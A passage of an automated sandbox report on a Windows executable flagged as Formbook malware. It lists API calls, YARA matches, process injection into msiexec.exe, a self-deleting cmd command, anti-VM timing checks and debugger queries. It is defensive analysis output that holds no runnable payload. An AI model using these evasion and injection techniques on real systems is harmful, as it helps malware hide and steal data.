          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9760 NtOpenProcess,7_2_045C9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA710 NtOpenProcessToken,7_2_045CA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9730 NtQueryVirtualMemory,7_2_045C9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C97A0 NtUnmapViewOfSection,7_2_045C97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CB040 NtSuspendThread,7_2_045CB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9820 NtEnumerateKey,7_2_045C9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98F0 NtReadVirtualMemory,7_2_045C98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C98A0 NtWriteVirtualMemory,7_2_045C98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9950 NtQueueApcThread,7_2_045C9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C99D0 NtCreateProcessEx,7_2_045C99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A10 NtQuerySection,7_2_045C9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A00 NtProtectVirtualMemory,7_2_045C9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A20 NtResumeThread,7_2_045C9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9A80 NtOpenDirectoryObject,7_2_045C9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045C9B00 NtSetValueKey,7_2_045C9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045CA3B0 NtGetContextThread,7_2_045CA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B83A0 NtAllocateVirtualMemory,7_2_030B83A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B8270 NtReadFile,7_2_030B8270
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B82F0 NtClose,7_2_030B82F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B81C0 NtCreateFile,7_2_030B81C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B839A NtAllocateVirtualMemory,7_2_030B839A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B826B NtReadFile,7_2_030B826B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: String function: 009FB150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0458B150 appears 35 times
          Source: RCS76393.exe, 00000003.00000002.363023409.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs RCS76393.exe
          Source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RCS76393.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
          Source: RCS76393.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@12/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
          Source: C:\Users\user\Desktop\RCS76393.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\RCS76393.exeUnpacked PE file: 3.2.RCS76393.exe.400000.0.unpack .text:ER;.data:W;.jidiy:W;.wahe:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: RCS76393.exeStatic PE information: section name: .jidiy
          Source: RCS76393.exeStatic PE information: section name: .wahe
          Source: RCS76393.exeStatic PE information: section name: .new
          Source: initial sample, Static PE information: section name: .text entropy: 7.49545295007
          Source: C:\Windows\SysWOW64\msiexec.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RCS76393.exe, RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exe, RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exe, RDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exe, RDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_004088B0 rdtsc 3_2_004088B0
          Source: C:\Windows\explorer.exe TID: 6280, Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7148, Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe, Last function: Thread delayed
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmp, Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.346305900.0000000008540000.00000004.00000001.sdmp, Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmp, Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmp, Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RCS76393.exe, Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RCS76393.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe, Process queried: DebugPort
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_004088B0 rdtsc 3_2_004088B0
          Source: C:\Users\user\Desktop\RCS76393.exe, Code function: 3_2_00409B20 LdrLoadDll, 3_2_00409B20
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A076E2 mov eax, dword ptr fs:[00000030h]3_2_00A076E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A38EC7 mov eax, dword ptr fs:[00000030h]3_2_00A38EC7
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAFEC0 mov eax, dword ptr fs:[00000030h]3_2_00AAFEC0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A236CC mov eax, dword ptr fs:[00000030h]3_2_00A236CC
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC8ED6 mov eax, dword ptr fs:[00000030h]3_2_00AC8ED6
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAFE3F mov eax, dword ptr fs:[00000030h]3_2_00AAFE3F
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]3_2_009FC600
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]3_2_009FC600
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]3_2_009FC600
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A28E00 mov eax, dword ptr fs:[00000030h]3_2_00A28E00
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1608 mov eax, dword ptr fs:[00000030h]3_2_00AB1608
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]3_2_00A2A61C
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]3_2_00A2A61C
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FE620 mov eax, dword ptr fs:[00000030h]3_2_009FE620
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0766D mov eax, dword ptr fs:[00000030h]3_2_00A0766D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h]3_2_00ABAE44
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h]3_2_00ABAE44
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]3_2_00A77794
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]3_2_00A77794
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]3_2_00A77794
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A08794 mov eax, dword ptr fs:[00000030h]3_2_00A08794
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A337F5 mov eax, dword ptr fs:[00000030h]3_2_00A337F5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2E730 mov eax, dword ptr fs:[00000030h]3_2_00A2E730
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h]3_2_00AC070D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h]3_2_00AC070D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h]3_2_00A2A70E
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h]3_2_00A2A70E
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h]3_2_009F4F2E
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h]3_2_009F4F2E
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1F716 mov eax, dword ptr fs:[00000030h]3_2_00A1F716
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h]3_2_00A8FF10
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h]3_2_00A8FF10
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0FF60 mov eax, dword ptr fs:[00000030h]3_2_00A0FF60
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC8F6A mov eax, dword ptr fs:[00000030h]3_2_00AC8F6A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0EF40 mov eax, dword ptr fs:[00000030h]3_2_00A0EF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045BA44B mov eax, dword ptr fs:[00000030h]7_2_045BA44B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461C450 mov eax, dword ptr fs:[00000030h]7_2_0461C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0461C450 mov eax, dword ptr fs:[00000030h]7_2_0461C450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045A746D mov eax, dword ptr fs:[00000030h]7_2_045A746D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04641C06 mov eax, dword ptr fs:[00000030h]7_2_04641C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465740D mov eax, dword ptr fs:[00000030h]7_2_0465740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465740D mov eax, dword ptr fs:[00000030h]7_2_0465740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465740D mov eax, dword ptr fs:[00000030h]7_2_0465740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04606C0A mov eax, dword ptr fs:[00000030h]7_2_04606C0A
